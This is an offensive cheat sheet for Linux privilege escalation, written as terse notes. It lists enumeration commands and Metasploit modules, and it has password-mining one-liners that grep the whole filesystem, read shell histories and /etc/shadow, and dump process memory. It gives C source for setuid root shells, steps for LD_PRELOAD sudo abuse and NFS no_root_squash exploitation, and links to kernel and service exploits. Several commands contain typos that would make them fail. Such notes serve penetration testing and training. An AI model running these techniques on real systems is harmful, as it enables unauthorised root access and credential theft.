Privilege escalation

MSF

post/multi/recon/local_exploit_suggester

Enumeration

https://cs.piosky.fr/enumeration/unix/

Crontab

User-level - /var/spool/cron/crontabs
system-level - /etc/crontabs

$PATH redefinition
files found in left-most defined path will take presidence in the search-order
File overwrite / file missing
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Spot ponctual processes

#!/bin/bash

IFS=$'\n'

old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  diff <(echo "$old_process") <(echo "$new_process")
  sleep 1
  old_process=$new_process
done

Tricks

su root (creds reuse)
sudo -u <user> bash -i
ls -lahR /home
strace <strace <executable_file> 2>&1 | grep -i -E "open|access|no such file">

Startup scripts

find / -perm -o+w -type f 2>/dev/null | grep -v '/proc\|/dev'

Rights on files

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -777 -type f 2>/dev/null    # Open permissions 

Writable files for user or group

find / perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/nul

Writable directories for user or group

find / perm /u=w -type -d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null

Password Mining

history
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
ls -l /etc/passwd
ls -l /etc/shadow
grep -RiIn passw / 2>/dev/null
grep -rnw '/' -ie 'pass' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASS' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_PASSWORD' --color=always 2>/dev/null | grep -vi binary
grep -rnw '/' -ie 'DB_USER' --color=always 2>/dev/null | grep -vi binary
gdb -p <pid>
info proc mappings
dump memory <out_file> <start_mem_region> <stop_mem_region>

LD_PRELOAD / LD_LIBRARY_PATH

Detection

sudo -l

Exploitation

1) Set LD_PRELOAD to point to the .so file
2) sudo LD_PRELOAD=<full_path_to_so_file> <program>

SetUID

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}
#include <stdio.h>
#include <unistd.h>
main()
{
  setuid(0);
  execl("/bin/sh","sh",0);
}
gcc -o root root.c
chown root:root && chmod 4777 /var/tmp/root
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p

Specifics vulnerabilities

Dirty c0w

https://dirtycow.ninja/

Sudo on apache2
apache2 -f /etc/shadow
MySQL

https://web.archive.org/web/20170716101504/https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/

Exim

Detection

dpkg -l | grep -i exim (<4.86.2)
exim -bV -v | grep -i perl (perl compiled)
head /etc/exim.conf (perl_startup option)

Exploitation

exploit/unix/local/exim_perl_startup
CVE-2016-1247

Detection

dpkg -l

Exploit

https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
NFS

Detection

cat /etc/exports => looking for no_root_squash
add no_root_squash if write perm

Exploitation

1) Mount the nfs export to the local linux system
2) As root (on the localhost), compile an executable and place it in the mounted directory
3) Set 'suid' permissions to the executable
4) Run the file on the NFS server
showmount -e <ip>
chown root:root sid-shell; chmod +s sid-shell

Ressources

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://guif.re/linuxeop
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/

Tools

https://github.com/rebootuser/LinEnum
https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
http://www.securitysift.com/download/linuxprivchecker.py
https://github.com/1N3/PrivEsc/tree/master/linux